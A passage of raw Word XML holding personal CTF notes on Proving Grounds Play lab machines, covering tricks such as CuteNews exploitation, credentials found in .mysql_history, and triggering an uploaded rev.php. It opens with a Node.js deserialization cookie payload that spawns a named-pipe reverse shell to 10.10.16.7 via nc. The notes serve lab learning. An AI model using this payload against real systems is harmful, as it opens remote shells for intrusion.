          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{"username":"_$$ND_FUNC$$_require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/f|/bin/sh -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.16.7 44444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/tmp/f', function(error, stdout, stderr) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log(stdout) })","country":"Lameville","city":"Lametown","num":"2"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to encode this in Base64 before using this as a cookie. And also change the IP and Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Named Pipe Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And it's written in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, make sure to change the cookie within the Network tool. Changing within the Cookie Extension can cause some problems, at least in my experience</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7im3l8kgkyk4" w:id="509"/>
      <w:bookmarkEnd w:id="509"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CuteNews</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1189">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we exploited a website that used CuteNews. It was kind of challenging since a lot of the github exploits didn't work, and it was hard to get the files from searchsploit into metasploit, so it's worth a read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_75fpc29566e7" w:id="510"/>
      <w:bookmarkEnd w:id="510"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scrolling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1190">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Gaara</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play box, there was a web page that looked blank, but you had to scroll down to the bottom to see something</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xu8cnol71gjq" w:id="511"/>
      <w:bookmarkEnd w:id="511"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the flag as a password for an account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is so cheeky. But in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1191">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, they gave us a username, and made the password to the account the same thing as the first flag (cybersploit{youtube.com/c/cybersploit}).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e80wftz4qhgu" w:id="512"/>
      <w:bookmarkEnd w:id="512"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">textpattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The text pattern CMS had an interesting attack vector as seen on </w:t>
      </w:r>
      <w:hyperlink r:id="rId1192">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">driftingblues6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It was simple and easy though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s5y0nidva9rq" w:id="513"/>
      <w:bookmarkEnd w:id="513"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.mysql_history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the FunboxRookie PG Play, there was a file called ".mysql_history" within /home/tom that had credentials, but those credentials were actually for the tom account, not for SQL, so it allowed me to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since running the command asked me for password and I now know Tom's password, and it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x8rotjxos0x7" w:id="514"/>
      <w:bookmarkEnd w:id="514"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading files when there are multiple web servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1193">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Katana</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, there were multiple web servers (multiple open ports), and there was an upload endpoint on one of the webservers. However, when you upload something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then try and access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on that website, it didn't trigger the reverse shell. You actually had to try and access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the other web servers, and then it got a 504 error, but the rev shell was triggered. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3tk26vyh4wuv" w:id="515"/>
      <w:bookmarkEnd w:id="515"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernet is a symmetric encryption method. It was first seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1194">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PyExec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play. Inside of a MySQL database, we found a row with a token and a key. We had to put that into this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1195">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1196">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://asecuritysite.com/tokens/ferdecode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) in order to decode the message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fiq7l7pd3zkq" w:id="516"/>
      <w:bookmarkEnd w:id="516"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirtycow2</w:t>
      </w:r>
    </w:p>
